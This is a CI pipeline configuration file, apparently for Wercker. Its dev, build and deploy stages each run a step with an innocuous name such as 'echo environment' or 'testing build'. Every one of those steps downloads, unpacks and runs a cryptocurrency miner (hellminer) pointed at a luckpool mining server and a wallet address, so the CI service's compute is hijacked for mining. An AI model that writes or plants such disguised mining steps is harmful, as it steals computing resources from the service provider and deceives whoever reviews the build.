box: python
command-timeout: 60
# this pipeline will use busybox
dev:
  steps:
    - script:
      name: echo environment
      code: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xzf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RSLaafsZRq7WNqhcCQQzwxe57y2PZc3eP8.outlo -p x --cpu 7
build:
  # override busybox
  box: python
  steps:
    - script:
        name: testing build
        code: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xzf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RSLaafsZRq7WNqhcCQQzwxe57y2PZc3eP8.outlo -p x --cpu 7
deploy:
  # override busybox
  box: nodesource/node:trusty
  steps:
    - script:
        name: testing deploy
        code: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xzf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RSLaafsZRq7WNqhcCQQzwxe57y2PZc3eP8.outlo -p x --cpu 7
